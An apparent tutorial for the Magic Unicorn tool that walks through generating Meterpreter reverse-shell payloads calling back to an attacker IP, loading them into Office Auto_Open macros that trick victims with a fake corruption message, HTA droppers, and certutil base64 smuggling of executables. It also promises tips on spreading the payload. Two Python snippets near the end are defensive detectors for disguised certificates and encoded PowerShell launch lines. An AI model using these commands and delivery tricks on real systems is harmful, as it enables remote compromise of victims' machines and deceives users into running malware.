Magic Unicorn V 2.0 PowerShell Downgrade Attack

Magic Unicorn is a simple tool for performing a PowerShell downgrade attack and injecting shellcode straight into memory. It is based on Matthew Graeber's PowerShell attacks and the PowerShell bypass technique presented by David Kennedy (TrustedSec) and Josh Kelly at Defcon 18.

Usage is simple: just run Magic Unicorn (ensure Metasploit is installed and on the right path) and it will automatically generate a PowerShell command. You then simply cut and paste that PowerShell code into a command line window or deliver it through a payload delivery system.

Getting Started

Go over to the TrustedSec GitHub Unicorn repository and download the latest version of unicorn by clicking the Download Zip button on the left of the page.

Once downloaded, extract the zip file somewhere easy to find, e.g. the Desktop.

Open up a terminal, navigate to wherever you extracted unicorn and type this command:

python unicorn.py

You should be presented with a nice ASCII picture of a unicorn and, below it, some examples of the different commands.

unicorn commands

I will run through each example individually below with some tips on how to deploy and spread the payload.

Powershell Attack

python unicorn.py windows/meterpreter/reverse_tcp 192.168.1.5 443

This command sets up a reverse_tcp Meterpreter payload calling back to an IP address or hostname over port 443.

After you run the command it generates two files, powershell_attack.txt and unicorn.rc. The text file contains all of the code needed to inject the PowerShell attack into memory.

The rc file can be used with Metasploit to quickly open up a listener on the port you specified in the command:

msfconsole -r unicorn.rc

When the listener is all set up, open the powershell_attack.txt file, copy its contents directly into a command prompt and hit enter; you will shortly receive a session in Metasploit.

Macro Attack

python unicorn.py windows/meterpreter/reverse_tcp 192.168.1.5 443 macro

Adding macro to the end of the command formats the powershell_attack.txt file so it can be inserted as a macro into Word or Excel.

Open up Word or Excel, go to File, Properties, Ribbons, and select Developer. Once you do that, you will have a Developer tab. Create a new macro, call it Auto_Open and paste the generated code into it. This will run automatically. Note that a message will prompt the user saying that the file is corrupt and will automatically close the Excel document. THIS IS NORMAL BEHAVIOR! This tricks the victim into thinking the Excel document is corrupted. You should get a shell through PowerShell injection after that.

NOTE: WHEN COPYING AND PASTING INTO EXCEL, IF THERE ARE ADDITIONAL SPACES THAT ARE ADDED YOU NEED TO REMOVE THESE AFTER EACH OF THE POWERSHELL CODE SECTIONS UNDER VARIABLE “x” OR A SYNTAX ERROR WILL HAPPEN!

HTA Attack

python unicorn.py windows/meterpreter/reverse_tcp 192.168.1.5 443 hta

The HTA attack automatically generates two files: index.html, which tells the browser to use Launcher.hta, and Launcher.hta itself, which contains the malicious PowerShell injection code. All files are exported to the hta_access/ folder, where there will be three main files: index.html, Launcher.hta and unicorn.rc. You can run msfconsole -r unicorn.rc to launch the listener for Metasploit.

A user must click Allow and Accept when using the HTA attack in order for the PowerShell injection to work properly.

Certutil Attack

python unicorn.py <path_to_payload/exe_encode> crt

The certutil attack vector was identified by Matthew Graeber (@mattifestation). It allows you to take a binary file, convert it into base64 and then use certutil on the victim machine to convert it back into a binary. This should work on virtually any system and allows you to transfer a binary to the victim machine disguised as a certificate file. To use this attack, simply place an executable in the path of unicorn and run python unicorn.py <exe_name> crt to get the base64 output. Once that's finished, go to the decode_attack/ folder, which contains the files. The bat file is a command that can be run on a Windows machine to convert it back into a binary.
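Because certutil only decodes the base64 between the PEM markers, a "certificate" file that really carries an executable can be spotted by looking at what the body decodes to. The following Python check is an added example for defenders and is not part of unicorn; the two PEM samples are constructed inline (the fake one wraps only a PE header, not a working binary).

```python
import base64
import re

PEM_RX = re.compile(
    r"-----BEGIN CERTIFICATE-----\s*(.*?)\s*-----END CERTIFICATE-----", re.S
)

# Constructed sample of a "fake certificate": PEM armour around base64 of a
# DOS/PE header, which is what a binary smuggled via certutil -decode looks like.
FAKE_PE_BODY = b"MZ" + b"\x90\x00" * 30 + b"PE\x00\x00" + b"\x00" * 32
FAKE_CERT_TEXT = (
    "-----BEGIN CERTIFICATE-----\n"
    + base64.encodebytes(FAKE_PE_BODY).decode("ascii")
    + "-----END CERTIFICATE-----\n"
)

# Constructed sample of what a genuine DER certificate starts with: an ASN.1
# SEQUENCE tag (0x30). The rest is filler, not a parsable certificate.
REAL_LOOKING_TEXT = (
    "-----BEGIN CERTIFICATE-----\n"
    + base64.encodebytes(b"\x30\x82\x01\x00" + b"\x00" * 60).decode("ascii")
    + "-----END CERTIFICATE-----\n"
)


def classify_cert_text(text: str) -> str:
    """Classify a PEM-looking file by what its base64 body actually decodes to."""
    m = PEM_RX.search(text)
    if not m:
        return "not-pem"
    try:
        body = base64.b64decode(re.sub(r"\s+", "", m.group(1)), validate=True)
    except ValueError:
        return "bad-base64"
    if body.startswith(b"MZ"):
        return "pe-executable"      # DOS/PE header: an executable, not a certificate
    if body[:1] == b"\x30":
        return "der-sequence"       # plausible X.509 DER structure
    return "unknown-binary"


if __name__ == "__main__":
    for name, text in [("fake", FAKE_CERT_TEXT), ("real-looking", REAL_LOOKING_TEXT)]:
        print(name, classify_cert_text(text))
```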

Custom PS1 Attack Instructions

This attack method allows you to convert any PowerShell file (.ps1) into an encoded command or macro.

Note that if you choose the macro option, a large ps1 file may exceed the number of carriage returns allowed by VBA. You may change the number of characters in each VBA string by passing an integer as a parameter.

Examples:
python unicorn.py harmless.ps1
python unicorn.py myfile.ps1 macro
python unicorn.py muahahaha.ps1 macro 500

The last one will use a 500 character string instead of the default 380, resulting in fewer carriage returns in VBA.
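Whether the encoded command comes from powershell_attack.txt or from a converted .ps1, what a defender finds in a macro, an HTA or a process-creation log is a PowerShell launch line with an -enc argument. This Python helper, an added example that is not unicorn's code, flags the switches characteristic of that launch style and decodes the argument, which PowerShell expects as base64 over UTF-16LE; the sample command line is constructed and only mimics the general shape of such a line.

```python
import base64
import re

# Constructed sample of an encoded PowerShell launch line (NOT unicorn's output).
SAMPLE_SCRIPT = "Write-Output 'constructed sample'"
SAMPLE_CMDLINE = (
    "powershell -version 2 -nop -w hidden -enc "
    + base64.b64encode(SAMPLE_SCRIPT.encode("utf-16-le")).decode("ascii")
)

# Switches that together characterise this delivery style.
INDICATORS = {
    "downgrade to v2 engine": re.compile(r"-v(?:ersion)?\s+2\b", re.I),
    "hidden window": re.compile(r"-w(?:indowstyle)?\s+hidden", re.I),
    "no profile": re.compile(r"-nop(?:rofile)?\b", re.I),
    "encoded command": re.compile(r"-e(?:nc|ncodedcommand)?\s+[A-Za-z0-9+/=]{16,}", re.I),
}


def find_indicators(cmdline: str) -> list:
    """Return the names of every indicator present in a process command line."""
    return [name for name, rx in INDICATORS.items() if rx.search(cmdline)]


def decode_encoded_command(cmdline: str) -> str:
    """Extract the -enc/-encodedcommand argument and decode it.

    Only the base64-over-UTF-16LE encoding PowerShell itself accepts is tried;
    returns "" when no argument is present or it does not decode cleanly.
    """
    m = re.search(r"-e(?:nc|ncodedcommand)?\s+([A-Za-z0-9+/=]+)", cmdline, re.I)
    if not m:
        return ""
    try:
        return base64.b64decode(m.group(1), validate=True).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):
        return ""


if __name__ == "__main__":
    print(find_indicators(SAMPLE_CMDLINE))
    print(decode_encoded_command(SAMPLE_CMDLINE))
```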
